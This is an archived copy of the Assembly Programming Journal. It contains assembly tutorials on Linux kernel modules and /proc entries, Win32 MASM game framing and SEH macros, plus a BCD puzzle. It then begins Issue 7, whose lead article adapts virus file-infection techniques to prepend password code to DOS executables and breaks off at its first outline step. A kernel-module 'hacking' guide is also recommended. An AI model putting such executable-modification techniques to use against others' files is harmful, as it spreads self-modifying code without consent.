     gcc -c filename
assuming that the file extension is .s or .S . Gcc will produce a .o output
file which may be loaded using 'insmod' and unloaded using 'rmmod'. The
compilation/test cycle for a linux kernel module is essentially
     gcc -c asm_module.s
     insmod asm_module
     lsmod
     rmmod asm_module
Note that modules which cannot be initialized or unloaded will remain loaded
until reboot, thus preventing another module with the same name from being
loaded. In order to minimize reboots, it helps to symlink a number of 'test'
filenames to the original object file, so that 'asm_module.o' would be
linked
to 'asm_module1.o', 'asm_module2.o', and so on.


Debugging kernel modules can be quite a chore. While kernel-mode debuggers
exist for linux, it is often more expedient to use primitive "printf"
debugging
techniques and core file analysis. In the former case, the linux kernel
provides the function "printk()", which is the kernel-mode equivalent of
printf(); the one notable difference is that the format string should begin
with a 'priority code' indicating how syslogs should handle the message. The
priority codes are:
     <0> Kernel Emergency
     <1> Kernel Alert
     <2> Kernel Critical Condition
     <3> Kernel Error
     <4> Kernel Warning
     <5> Kernel Notice
     <6> Kernel Info
     <7> Kernel Debug

In addition, when a kernel module 'crashes', it writes an 'oops' file to
STDERR. This is essentially a stripped-down core file giving the registers
and stack state at the moment of the crash; it can be saved to a file and
loaded with the ksymoops utility to make the report more coherent.

One of the best tools for debugging assembly language kernel modules is gcc
itself. If the module --or the problematic portion thereof-- can be written
correctly in C, a GAS version can be produced by compiling the module with
     gcc -S filename
This will produce an assembly-language version of the program, loaded with
GAS preprocessor directives. This file can be cleaned up and compared
against
the hand-tooled assembly language version in order to judge the effects of
C macros, data alignment, and sections.


Hello Kernel
------------
As usual, it is best to start with the most simple module possible in order
to
demonstrate the absolute basics of LKM programming. Other than the use of
init
and cleanup functions, this module should not present any surprises:

#---------------------------------------------------------------------Asm_mod.s
.globl init_module
.globl cleanup_module
.extern printk

.text
.align 4
init_module:
      pushl $strLoad
      call printk
      popl %eax
      xor %eax, %eax
      ret

cleanup_module:
      pushl $strUnload
      call printk
      popl %eax
      xorl %eax, %eax
      ret


.section .rodata
.align 32
strLoad:
.ascii "<1> Asm Module Loaded!\n\0"
strUnload:
.ascii "<1> Asm Module Unloaded\n\0"

.section .modinfo
__module_lernel_version:
.ascii "kernel_version=2.2.15\0"
#---------------------------------------------------------------------------EOF

As you can see, this program does nothing special -- it simply outputs an
alert when the module is loaded or unloaded. Note the .modinfo section of
the
program; this is where the module specifies which kernel it was compiled
for.
In C, a macro determines this based on a constant in the kernel header
files;
in assembly, you will have to specify the kernel version by hand or with a
Makefile. Also note the .rodata section -- this is where the kernel expects
to
find string references, and one can expect a lot of segmentation faults if
the
strings are placed in .data instead.


Using the /proc Filesystem
--------------------------
The trend in linux, as well as in other Unixes, is to provide runtime access
to
kernel-space data through the /proc file system. Linux system tweakers will
no
doubt be familiar with cat'ing /proc files to check the status of kernel
variables, and echo'ing values to those files in order to change the values
of
such variables. The /proc filesystem is a handy mechanism for interfacing
with
kernel modules without the relative complexity of a device file and an
ioctl()
interface.

Creating an entry in the /proc file system consists of the following steps:
      1. Prepare a proc_dir_entry struct to describe the /proc file
      2. Register the /proc file to create it
      3. Unregister the /proc file when finished with it

The most important component of this process is obviously the proc_dir_entry
structure; it is define in $INCLUDE/linux/proc_fs.h:
     struct proc_dir_entry {
         unsigned short low_ino;                        //inode # of the
/proc file
         unsigned short namelen;                        //length of filename
         const char *name;                              //pointer to filename
string
         mode_t mode;                                   //Access mode
[permissions]
         nlink_t nlink;                                 //# of links to the
file
         uid_t uid;                                     //UID of file owner
         gid_t gid;                                     //GID of file owner
         unsigned long size;                            //Size of the file
         struct inode_operations * proc_iops;
         struct file_operations * proc_fops;
         get_info_t *get_info;                     //Function handling file
reads
         struct module *owner;
         struct proc_dir_entry *next, *parent, *subdir;
         void *data;                                    //pointer to
'user-defined' data
         read_proc_t *read_proc;
         write_proc_t *write_proc;
         unsigned int count; /* use count */
         int deleted;        /* delete flag */
         kdev_t  rdev;
     };

The last 5 members of the structure are not defined in the proc_dir_entry
man
page, and do not appear to be used; however, as demonstrated in the sample
code, space must be reserved for them.

In most cases, the majority of these structure members cal be set to NULL in
order to have them filled with default values. The members that should
normally
be set to null include low_ino, uid, gid, size, *proc_iops, *proc_fops,
*owner,
*next, *parent, *subdir, and *data. This leaves the following members to be
filled by the program:
      namelen  -- length of *name string, without the terminating \0
      *name    -- .rodata string containing the name of the /proc file
      mode     -- access permissions for the file
      nlink    -- 1 for normal files, 2 for directories
      *getinfo -- callback routine for reads to the /proc file
Note that *getinfo() is called for normal /proc file reads, e.g. `cat
\proc\modules`. In order to handle more advanced operations such as writes,
links, and so forth, an inodes_operations and a file_operations structure
need
to set up.

The *getinfo() function has the following prototype:
     int get_info(char *buffer, char **retBuf, off_t pos, int size);
where buffer is the buffer provided by the user-space program, size is the
size of that buffer, pos is the current position in the file [to support
multiple, sequential reads by the user-space program], and retBuf is a
pointer
to a buffer which can be used in place of the supplied buffer [for example,
if
size is too small]. When a return buffer is used, a pointer to the buffer is
stored in retBuf, and the size of the buffer is returned in eax.

It is important to use stack frames in all kernel-mode callbacks. The
prototype
for a get_info function in GAS would be
     .globl get_info
     get_info:
         pushl %ebp
         movl %esp,%ebp
         ....
         movl %eax,20(%ebp)
         leave
         ret
The parameters will all be at offsets of %ebp, as the default return value
[an
invisible fifth parameter that is always zero] demonstrates.

Registering and unregistering a proc file are fairly straightforward. The
proc_register command has the prototype
      proc_register(proc_dir_entry *parent, proc_dir_entry *child)
and always returns 0. The *parent structure must refer to a directory within
the /proc tree; the global symbols proc_root and proc_sys_root refer to the
directories /proc and /proc/sys, respectively. The child structure refers to
the /proc entry that is being created.

The proc_unregister command has the prototype
     proc_unregister(proc_dir_entry * parent, int inode);
and returns 0 only on success. The parent node will be the same as in the
proc_register call, while inode refers to the inode assigned to the /proc
file
being unregistered. Note that the inode of a /proc file is specified in the
first member of the proc_dir_entry structure; if the inode member is 0 on
/proc
file registration, an inode number is dynamically assigned and stored in the
inode member.


Hello Proc
----------
The following program will demonstrate the use of the get_info() function;
it
creates a /proc file which, when read, will return a simple string in the
buffer provided by the user-space program.
#--------------------------------------------------------------------Asm_proc.s
.globl init_module
.globl cleanup_module
.globl ReadAsmProcFile
.globl procAsm
.extern printk
.extern sprintf
.extern proc_root
.extern proc_register
.extern proc_unregister

.text
.align 4
init_module:
     pushl %ebp
     movl %esp,%ebp
      pushl $strLoad
      call printk
      popl %eax
      pushl $procAsm
      pushl $proc_root
      call proc_register
      addl $0x8, %esp
      xorl %eax, %eax
      leave
      ret

cleanup_module:
     pushl %ebp
     movl %esp,%ebp
      pushl $strUnload
      call printk
      popl %eax
      movzwl procAsm, %eax
      pushl %eax
      pushl $proc_root
      call proc_unregister
      addl $0x8, %esp
      xorl %eax, %eax
      leave
      ret

ReadAsmProcFile:
     pushl %ebp
     movl %esp,%ebp
     pushl $strRead
     movl 8(%ebp),%eax
     pushl %eax
     call sprintf
     addl $16,%esp
     movl %eax,20(%ebp)
      leave
      ret


.section .modinfo
__module_kernel_version:
.ascii "kernel_version=2.2.15\0"

.section .rodata
.align 32
strName:       .ascii "AsmModule\0"
strLoad:       .ascii "<1> Asm Module Loaded!\n\0"
strUnload:          .ascii "<1> Asm Module Unloaded\n\0"
strRead:       .ascii "This /proc file has nothing to say\n\0"

.data
.align 32
#______________________File_Permissions
.equ S_IFREG, 0100000
.equ S_IRUSR, 00400
.equ S_IWUSR, 00200
.equ S_IXUSR, 00100
.equ S_IRGRP, 00040
.equ S_IWGRP, 00020
.equ S_IXGRP, 00010
.equ S_IROTH, 00004
.equ S_IWOTH, 00002
.equ S_IXOTH, 00001

#________________________________________proc_dir_entry structure
procAsm:
procAsm_low_ino:              .short         0
procAsm_name_length:          .short         9
procAsm_name:                 .long          strName
procAsm_mode:                 .short         S_IFREG | S_IRUSR |S_IRGRP |
S_IROTH
procAsm_nlinks:               .short         1
procAsm_owner:                     .short         0
procAsm_group:                     .short         0
procAsm_size:                 .long          0
procAsm_operations:           .long          0
procAsm_read_proc:            .long          ReadAsmProcFile
                                    .zero     40
#________________________________________end proc_dir_entry

#---------------------------------------------------------------------------EOF
The /proc file can be read with the usual `cat /proc/AsmModule` commands. It
should be noted that get_info() is executed when the file is opened; this
allows different behavior to be supplied for file opens, reads, and writes.


Further Reading
---------------
Programming Linux kernel modules, either in assembly or in C, is a
complicated
and challenging field. The following online resources provide vital
information
on kernel module programming.

"Linux Kernel Module Programming Guide", by Ori Pomerantz
        http://www.linuxdoc.org/LDP/lkmpg/mpg.html
        The 'classic' guide to LKM programming. This work is part of the
Linux
        documentation project, and is available in most Linux distributions.
        Most LKM texts will assume you are familiar with the concepts
presented
        in this one.

"(nearly) Complete Linux Loadable Kernel Modules", by pragmatic / THC
        http://thc.pimmel.com/files/thc/LKM_HACKING.html
        Based on the exploratory LKM hacking essays of Phrack 50 and 52,
        this treatise on LKM hacking is very thorough and very informative.
        The text contains an introduction to LKM programming and proceeds to
        cover kernel modules from the security and hacking viewpoints, with
        plenty of source code to back up the discussion. If you read or print
        out only one LKM guide, this should be it.

"Linux Kernel Hacker Documentation"
        http://jungla.dit.upm.es/~jmseyas/linux/kernel/hackers-docs.html
        This page contains links to a number of articles and books on Linux
        kernel-mode programming.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.............................................GAMING.CORNER
                                             Win32 ASM Game Programming -
Part 1
                                             by Chris Hobbs


[This series  of articles was  first  posted at  GameDev.net and  is now
being
published here with the author's permission. Here is Chris Hobbs'
introduction
on this particular article:

"A tutorial series on the development of a complete game,  SPACE-TRIS, in
pure
   ASM.  This one covers the design document, code framework, and some Win32
ASM
   basics."

Visit his website at http://www.fastsoftware.com.
Preface, Html-to-Txt conversion and formating by Chili ]



This is the article that I am sure all of you have been waiting ever so
patiently for ... a complete series on the development of a game, in pure
Assembly Language of all things. I know all of you are as excited about this
article as I am, so I will try and keep this introduction brief. Instead of
laying every single thing out to you in black and white, I will try and
answer
a few questions that are asked most often, and the details will appear as we
progress ( I am making this up as I go you know ).


What is this article about?
---------------------------
This article is actually part of a seven article series on the development
of a
complete game, SPACE-TRIS, in 100% assembly language. We will be covering
any
aspect of game development that I can think of ... from design and code
framework to graphics and sound.


Who is this article for?
------------------------
This series is meant for anybody who wishes to learn something that they may
not have known before. Since the game is a relatively simple Tetris clone it
is
great for the beginner. Also, given the fact that not many people are even
aware that it is completely possible to write for Windows in assembly
language,
it is great for the more advanced developers out there too.


What do I need?
---------------
The only requirement is the ability to read. However, if you wish to
assemble
the source code, or participate in the challenge at the end of the article
series, you need a copy of MASM 6.12+. You can download a package called
MASM32
that will have everything that you need, and then some. Here is the link:
     http://www.pbq.com.au/home/hutch/.


Why Assembly Language?
----------------------
Many of you are probably wondering why anybody in their right mind would
write
in pure assembly language. Especially in the present, when optimizing
compilers
are the "in" thing and everybody knows that VC++ is bug free, right? Okay I
think I answered that argument ... but what about assembly language being
hard
to read, non-portable, and extremely difficult to learn. In the days of DOS
these arguments were very valid ones. In Windows though, they are simply
myths
left over from the good old days of DOS. I might as well approach these one
at
a time.

First, assembly language is hard to read. But for that matter so is C, or
even
VB. The readability results from the skill of the programmer and his/her
thoroughness at commenting the code. This is especially true of C++. Which
is
easier to read: Assembly code which progress one step at a time ( e.g. move
variable into a register, move a different variable into another register,
multiply ), or C++ code which can go through multiple layers of Virtual
Functions that were inherited? No matter what language you are in,
commenting
is essential ... use it and you won't have any troubles reading source code.
Remember just because you know what it means doesn't mean that everybody
else
does also.

Second, the issue of portability. Granted assembly language is not portable
to
other platforms. There is a way around this, which allows you to write for
any
x86 platform, but that is way beyond the scope of this article series. A
good
80-90% of the games written are for Windows. This means that the majority of
your code is specific to DirectX or the Win32 API, therefore ... you won't
be
porting without a huge amount of work anyway. So, if you want a truly
portable
game, then don't bother with writing for DirectX at all ... go get a
multi-platform development library.

Finally, there comes the issue of Assembly Language being extremely
difficult
to learn. Although there is no real way for me to prove to you that it is
easy,
I can offer you the basics, in a few pages, which have helped many people,
who
never saw a line of assembly language before, learn it. Writing Windows
assembly code, especially with MASM, is very easy. It is almost like writing
some C code. Give it a chance and I am certain that you won't be
disappointed.


Win32 ASM Basics
----------------
If you are already familiar with assembly language in the windows platform,
you
may want to skip this section. For those of you who aren't, this may be a
bit
boring, but hang with it ... this is very important stuff. For this
discussion
I will presume that you are at least familiar with the x86 architecture.

The first thing you need to understand are the instructions. There aren't
very
many that you will be using often so I will simply cover the ones that we
care
about.


MOV
---
This instruction moves a value from one location to another. You can only
move
from a register to register, memory to register, or register to memory. You
can
not move from a memory location to another memory location.

Example:
         MOV     EAX, 30
         MOV     EBX, EAX
         MOV     my_var1, EAX
         MOV     DWORD PTR my_var, EAX

The first example moves the value 30 into the EAX register. The second
example
moves the value in EAX into the EBX register. The third example moves the
value
of EAX into the variable my_var1. The fourth example moves the value of EAX
into the ADDRESS pointed to by my_var, we need to use the DWORD specifier so
that the assembler knows how much memory to move -- 1 byte ( BYTE ), 2 bytes
( WORD ), or 4 bytes ( DWORD ).


ADD & SUB
---------
These two instructions perform addition and subtraction.

Example:
         ADD     EAX, 30
         SUB     EBX, EAX

The examples simply add 30 to the EAX register and then subtract that value
from the EBX register.


MUL & DIV
---------
These two instructions perform multiplication and division.

Example:
         MOV     EAX, 10
         MOV     ECX, 30
         MUL     ECX
         XOR     EDX, EDX
         MOV     ECX, 10
         DIV     ECX

The examples above first load EAX with 10 and ECX with 30. EAX is always the
default multiplicand, and you get to select the other multiplier. When
performing a multiplication the answer is in EAX:EDX. It only goes into EDX
if
the value is larger than the EAX register. When performing a divide you must
first clear the EDX register that is what the XOR instruction does by
performing an Exclusive OR on itself. After the divide, the answer is in
EAX,
with the remainder in EDX, if any exists.

Of course, there are many more instructions, but those should be enough to
get
you started. We will probably only be using a few others, but they fairly
easy
to figure out once you have seen the main ones. Now we need to deal with the
calling convention. We will be using the Standard Call calling convention
since
that is what the Win32 API uses. What this means is that we push parameters
onto the stack in right to left order, but we aren't responsible for the
clearing the stack afterwards. Everything will be completely transparent to
you
however as we will be using the pseudo-op INVOKE to make our calls.

Next, there is the issue of calling Windows functions. In order to use
invoke,
you must have a function prototype. There is a program that comes with
MASM32
which builds include files ( equivalent to header files in C ) out of the
VC++
libraries. Then, you include the needed libraries in your code and you are
free
to make calls as you wish. You do have to build a special include file by
hand
for access to Win32 structures and constants. However, this too is included
in
the MASM32 package, and I have even put together a special one for game
programmers which will be included in the source code and built upon as
needed.

The final thing that I need to inform you about is the high level syntax
that
MASM provides. These are constructs that allow you to create If-Then-Else
and
For loops in assembly with C-like expressions. They are easiest to show once
we
have some code to put in, therefore you won't see them until next time. But,
they are there ... and they make life 100000 times easier than without them.

That is really about all you need to know. The rest will come together as we
take a look at the source code and such. So, now that we have that out of
the
way, we can work on designing the game and creating a code framework for it.


The Design Document
-------------------
Time for something a lot more fun ... designing the game. This is a process
that is often neglected simply because people want to start writing code as
soon as they have an idea. Although this approach can work for some people,
it
often does not. Or, if it does work, you end up re-coding a good portion of
your game because of a simple oversight. So, we will cover exactly how to
create a design document that you will be able to stick to, and will end up
helping you with your game.

First, you need to have an idea of what you want the game to be, and how you
want the game play. In our case this is a simple Tetris clone so there isn't
too much we need to cover in the way of game play and such. In many cases
though, you will need to describe the game play as thoroughly as possible.
This
will help you see if your ideas are feasible, or if you are neglecting
something.

The easy part is finished, now we need to come up with as many details as we
possibly can. Are we going to have a scoring system? Are we going to have
load/save game options? How many levels are there? What happens at the end
of a
level? Is there an introductory screen? These are the kinds of questions
that
you should be asking yourself as you work on the design of the game. Another
thing that may help you is to story board or flow chart the game on a piece
of
paper or your computer. This will allow you to see how the game is going to
progress at each point.

Once you have all of the details complete, it is time to start sketching the
levels out. How do you want the screens to appear? What will the interfaces
look like? This doesn't have to be precise just yet ... but it should give
you
a realistic idea of what the final versions will look like. I tend to break
out
my calculator and estimate positions at this point also. I have actually ran
out of room while creating the menu screen before. This was my own fault for
not calculating the largest size my text could be and it took a few hours to
re-do everything. Don't make the same mistake, plan ahead.

The final stage is just sort of a clean-up phase. I like to go back and make
sure that everything is the way I want it to be. Take a few days break from
your game beforehand. This will give you a fresh viewpoint when you come
back
to it later on. Often times, you will stare at the document for so long that
something extraordinarily simple will be glanced over and not included in
your
plan -- for instance, how many points everything is worth and the maximum
number of points they can get ( Not that I have ever found out halfway
through
the game that the player could obtain more points than the maximum score
allowed for, or anything like that ).

Whether you choose to use the process I have outlined, or one of your own
making, it is imperative that you complete this step. I have never been one
for
wasted effort -- I do it right the first time if possible, and learn from my
mistakes, as well as the mistakes of others. If this weren't necessary I
wouldn't do it. So, do yourself a favor and complete a design document no
matter how simple you think your game is.

The final preparation step is something that I like to call code framework.
This is where you lay out your blank source code modules and fill them with
comments detailing the routines that will go into them and the basic idea
behind how they operate. If you think you are perfect and have gotten every
detail in your design document then you can probably skip this step. But,
for
those of you like me, who are cautious, then give this phase a whirl. It
helps
you see how all of the pieces will fit together and more importantly if
something has been neglected or included that shouldn't have been.

Here is an example of the framework that I am speaking about from
SPACE-TRIS.
You can see that nothing much goes into it ... just an overview of the
module
more or less.

;###########################################################################
; ABOUT SPACE-TRIS:
;
;     This is the main portion of code. It has WinMain and performs all
;     of the management for the game.
;
;           - WinMain()
;           - WndProc()
;           - Main_Loop()
;           - Game_Init()
;           - Game_Main()
;           - Game_Shutdown()
;
;
;###########################################################################

;###########################################################################
; THE COMPILER OPTIONS
;###########################################################################

       .386
       .MODEL flat, stdcall
       OPTION CASEMAP :none   ; case sensitive

;###########################################################################
; THE INCLUDES SECTION
;###########################################################################

       ;==================================================
       ; This is the include file for the Windows structs,
       ; unions, and constants
       ;==================================================
       INCLUDE Includes\Windows.inc

       ;================================================
       ; These are the Include files for Window calls
       ;================================================
       INCLUDE \masm32\include\comctl32.inc
       INCLUDE \masm32\include\comdlg32.inc
       INCLUDE \masm32\include\shell32.inc
       INCLUDE \masm32\include\user32.inc
       INCLUDE \masm32\include\kernel32.inc
       INCLUDE \masm32\include\gdi32.inc

       ;====================================
       ; The Direct Draw include file
       ;====================================
       INCLUDE Includes\DDraw.inc

       ;===============================================
       ; The Lib's for those included files
       ;================================================
       INCLUDELIB \masm32\lib\comctl32.lib
       INCLUDELIB \masm32\lib\comdlg32.lib
       INCLUDELIB \masm32\lib\shell32.lib
       INCLUDELIB \masm32\lib\gdi32.lib
       INCLUDELIB \masm32\lib\user32.lib
       INCLUDELIB \masm32\lib\kernel32.lib

       ;=================================================
       ; Include the file that has our prototypes
       ;=================================================
       INCLUDE Protos.inc

;###########################################################################
; LOCAL MACROS
;###########################################################################

       szText MACRO Name, Text:VARARG
             LOCAL lbl
             JMP lbl
             Name DB Text,0
             lbl:
       ENDM

       m2m MACRO M1, M2
             PUSH        M2
             POP         M1
       ENDM

       return MACRO arg
             MOV   EAX, arg
             RET
       ENDM

       RGB MACRO red, green, blue
             XOR   EAX,EAX
             MOV   AH,blue
             SHL   EAX,8
             MOV   AH,green
             MOV   AL,red
       ENDM

       hWrite MACRO handle, buffer, size
             MOV   EDI, handle
             ADD   EDI, Dest_index
             MOV   ECX, 0
             MOV   CX, size
             ADD   Dest_index, ECX
             MOV   ESI, buffer
             movsb
       ENDM

       hRead MACRO handle, buffer, size
             MOV   EDI, handle
             ADD   EDI, Spot
             MOV   ECX, 0
             MOV   CX, size
             ADD   Spot, ECX
             MOV   ESI, buffer
             movsb
       ENDM

;##############################################################################
; Variables we want to use in other modules
;##############################################################################


;##############################################################################
; External variables
;##############################################################################


;##############################################################################
; BEGIN INITIALIZED DATA
;##############################################################################

     .DATA

;##############################################################################
; BEGIN CONSTANTS
;##############################################################################


;##############################################################################
; BEGIN EQUATES
;##############################################################################

       ;=================
       ;Utility Equates
       ;=================
FALSE       EQU   0
TRUE        EQU   1


;##############################################################################
; BEGIN THE CODE SECTION
;##############################################################################

   .CODE

start:

;########################################################################
; WinMain Function
;########################################################################


;########################################################################
; End of WinMain Procedure
;########################################################################



;########################################################################
; Main Window Callback Procedure -- WndProc
;########################################################################


;########################################################################
; End of Main Windows Callback Procedure
;########################################################################




;========================================================================
; THE GAME PROCEDURES
;========================================================================


;########################################################################
; Game_Init Procedure
;########################################################################


;########################################################################
; END Game_Init
;########################################################################



;########################################################################
; Game_Main Procedure
;########################################################################


;########################################################################
; END Game_Main
;########################################################################



;########################################################################
; Game_Shutdown Procedure
;########################################################################


;########################################################################
; END Game_Shutdown
;########################################################################

;######################################
; THIS IS THE END OF THE PROGRAM CODE #
;######################################
END start


Well, this is the end of the first article. The good news is all of the dry
boring stuff is behind us. The bad news is you won't get to see any code
until
I complete the next article. In the meantime I would suggest brushing up on
your assembly language and maybe searching on the Internet for some
references
on Win32 assembly language. You can find links to a lot of Win32 ASM
resources
at my website:
     http://www.fastsoftware.com.

Researching more information isn't a must ... but for those of you that
still
think this might be difficult, I would suggest taking the time to do so. It
isn't like you will be hindered by learning more. You may find another
resource
that helps you learn this stuff and that is ALWAYS a good thing.

In the next article we will get a skeleton version of SPACE-TRIS up and
running
along with coding our Direct Draw library functions. The goal is to get a
bitmap up onto the screen and I think we can accomplish it next time. If
everything goes as planned, you should see the work starting to pay off in a
loading game screen. I know it doesn't sound like much ... but appreciate
how
slowly we are progressing before we get further along. Because once we have
the
basics down, we are going to pull out all of the stops and then you will be
thankful we took the extra time to cover this stuff.

So young grasshoppers, until next time ... happy coding.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                                     SEH.INC
                                                                     by
X-Calibre
;Summary:       Macros for Structured Exception Handling
;Compatibility: MASM, Win32
;Notes:         Demonstration code contained in SEH.ASM, below

IFNDEF RaiseException
      RaiseException PROTO     STDCALL    dwExceptionCode:DWORD,
dwExceptionFlags:DWORD ,
nNumberOfArguments:DWORD, lpArguments:PTR DWORD
ENDIF

includelib kernel32.lib

TRY       MACRO
      PUSHCONTEXT    ASSUMES
      assume fs:nothing
      ; Install exception handler
      push @@handler
      push dword ptr fs:[0]
      mov       fs:[0], esp
      POPCONTEXT     ASSUMES
ENDM

CATCH     MACRO     exception
      LOCAL     @@invokeHandler

      jmp       @@removeHandler

@@handler:
IFNB <exception>
      mov       eax, [esp+4]
      cmp       dword ptr [eax], exception
      je        @@invokeHandler

      mov       eax, 1
      ret

@@invokeHandler:
ENDIF
ENDM

ENDC MACRO
      PUSHCONTEXT    ASSUMES
      assume fs:nothing
      ; Restore state
      mov       esp, dword ptr fs:[0]
      mov       esp, [esp]

@@removeHandler:
      pop       fs:[0]
      add       esp, 4

      POPCONTEXT     ASSUMES
ENDM

FINALLY   MACRO
      @@handler:
ENDM

ENDF MACRO
      LOCAL     @@removeHandler

      PUSHCONTEXT    ASSUMES
      assume fs:nothing
      ; Restore state
      cmp       esp, dword ptr fs:[0]
      je        @@removeHandler
      mov       esp, dword ptr fs:[0]
      mov       esp, [esp]

@@removeHandler:
      pop       fs:[0]
      add       esp, 4

      POPCONTEXT     ASSUMES
ENDM

THROW     MACRO     exception
      INVOKE    RaiseException, exception, 0, 0, NULL
ENDM

; ---- flags ---
EXCEPTION_INT_DIVIDE_BY_ZERO  equ  0C0000094h


                                                                     SEH.ASM
                                                                     by
X-Calibre
;Summary:       Sample program for using SEH.INC
;Compatibility: MASM, Win32
.386
.Model Flat, StdCall

include windows.inc
include user32.inc

include SEH.inc

includelib user32.lib

.code
tst  PROC
      THROW     0E0000001h
      ret
tst  ENDP

start:
main PROC
      TRY
           sub       edx, edx
           mov       ecx, 0
           idiv ecx

      CATCH(EXCEPTION_INT_DIVIDE_BY_ZERO)
           .data
           exceptionMsg   BYTE "Exception occured",0

           .code
           INVOKE    MessageBox, NULL, ADDR exceptionMsg, ADDR exceptionMsg,
MB_OK
      ENDC
main ENDP

blah PROC
      TRY
           call tst
      FINALLY
           .data
           finallyMsg     BYTE "In FINALLY-block",0

           .code
           INVOKE    MessageBox, NULL, ADDR finallyMsg, ADDR finallyMsg,
MB_OK
      ENDF
blah ENDP

      .data
      finishMsg BYTE "Program finished",0

      .code
      INVOKE    MessageBox, NULL, ADDR finishMsg, ADDR finishMsg, MB_OK

      ret
end start



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                                by Angel
Tsankov


Challenge
---------
Write as short as possible program to convert a two-digit BCD to
hexadecimal;
that is, the decimal representation of the output must represent the
hexadecimal representation of the input.

Solution
--------
The solution, in 14 bytes:
     ;Input  AL = (A * 16) + B
     ;Output AL = (A * 10) + B
     88 C4      MOV  AH, AL       ;AH = AL
     82 E4 F0   AND  AH, 0F0h     ;AH = (A * 16)
     D0 EC      SHR  AH, 1        ;AH = (A * 8)
     28 E0      SUB  AL, AH       ;AL = (A * 8) + B
     C0 EC 02   SHR  AH, 2        ;AH = A * 2
     00 E0      ADD  AL, AH       ;AL = (A * 10) + B

Submitted by Angel Tsankov <fn42551@...>.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#16 From: "Michael Mondragon" <mammon_@...>
Date: Tue Feb 22, 2000 10:13 am
Subject: APJ Issue#7 Dec 99-Feb 00
mammon_@...
Send Email Send Email
 
______________________________________________________
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                              Dec 99-Feb
00
:::\_____\::::::::::.                                             Issue
   7
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Extending DOS Executables"..........................Digital.Alchemist

"Creating a User-Friendly Interface"......................S.Sirajudeen

"ASM Building Blocks"...................................Laura.Fairhead

"Converting Strings to Numbers"...........................Chris.Dragan

"List Scan Library Routine".............................Laura.Fairhead

"Using the RTC"..........................................Jan.Verhoeven

"Chaos Animation".......................................Laura.Fairhead

"Inline Assembler With Modula"...........................Jan.Verhoeven

"Assembly on the Alpha Platform"........................Rudolf.Seemann

Column: Win32 Assembly Programming
     "Direct Draw Samples"....................................X-Calibre

Column: The Unix World
     "Enter fbcon".................................Konstantin.Boldyshev

Column: Assembly Language Snippets
     "ToHex".....................................................Ronald
     "Hex2ASCII"................................................cpuburn
     "MMX ltostr".....................................Cecchinel.Stephan

Column: Issue Solution
     "ScreenDump"........................................Laura.Fairhead

----------------------------------------------------------------------
        +++++++++++++++++++Issue Challenge++++++++++++++++++
             Dump the contents of the current console to a file
----------------------------------------------------------------------










::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                      by
mammon_


What? Late again? Wasn't there going to be a December issue?

Well, yeah, there was; unfortunately once again real-world concerns
interfered
with timely distribution. And, as usually happens with late issues, this one
is waaaaay oversized, almost 200K due to all the articles I crammed into it.
I
didn't even get a chance to include my linux kernel modules article...

This issue seems to have a bit of a 'Hex-to-ASCII' bent to it, mostly from
the
snippets but also from the conversion routines offered by Chris and Laura.
In
addition, some 'fringe' asm has been supplied with Jan's Modula article,
along
with an introduction to Alpha assembly language by Rudolph Seeman.
Konstantin
Boldyshev, who helps maintain the linuxassembly.org site, continues the Unix
trend with an introduction to frame-buffer programming under linux.

The two leading articles are both quite large and offer a wealth of
information
for the beginning and experienced asm programmer. Digital Alchemist has
produced
a work on applying virus techniques to non-destructive applications, and S.
Sirajudeen has tackled the  huge problem of creating a decent UI in
console-mode
programs.

In this issue I have tried to leave the code comments as untouched as
possible;
the coding styles of the authors vary quite widely, and each clearly
demonstrates
the planning behind the program itself -- showing how the algorithm was
conceived before implementation. Stripping any of these examples of all but
comments will soon reveal the worksheet used by the coders to develop their
programs.

Finally, I have taken to formatting these issues in Vim under linux; to
check
margins and pagination I have begun proofing them in Netscape and
WordPerfect
[10 pt Courier, natch]; they should view fine in any web browser and in most
word processors; to those stuck with Notepad or Edit.com ... my apologies.

_m



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                       Extending DOS
Executables
                                                       by Digital Alchemist


The reason behind this essay is to show how techniques first developed by
virus
writers can be used for benevolent purposes.  It is my opinion that all
knowledge is good and viral techniques are certainly no exception.  I will
lead
you through the development of a program called DOSGUARD which benignly
modifies DOS executables, both COM and EXE.


DESCRIPTION OF DOSGUARD
-----------------------
DOSGUARD is a DOS COM program which I developed in order to restrict access
to
certain programs on my computer.  DOSGUARD modifies all of the COM and EXE
files in the current directory, adding code to each one that requires the
user
to correctly enter a password before running the original program.

DOSGUARD, while sufficient for this article, could use a little work in the
realm of user friendliness.  More user feedback and a better way to specify
which files to be modified are needed.  In addition, I have written a
version
of DOSGUARD that uses simple xor encryption to improve security.

DOSGUARD was written using turbo assembler.


STRUCTURE OF COM FILES
----------------------
Unlike the EXE file format, the programmer has no input into the segment
format
of COM files.  All COM files consist of 1 segment only, with no predefined
distinction between data and code.  After DOS finishes some preparatory
work,
the COM file is loaded at offset 100h.  The first 256 bytes are known as the
Program Segment Prefix(PSP).  Located at offset 80h is an important data
structure called the DTA or Data Transfer Area.  The DTA is important, but
most
of the rest of the PSP can be ignored by the programmer.  Before actually
starting execution of the COM program, DOS sets up the stack at the top of
the
segment(the highest memory address).


OUTLINE OF COM MODIFICATION
---------------------------
1. Open the file and read 1st 5 bytes.
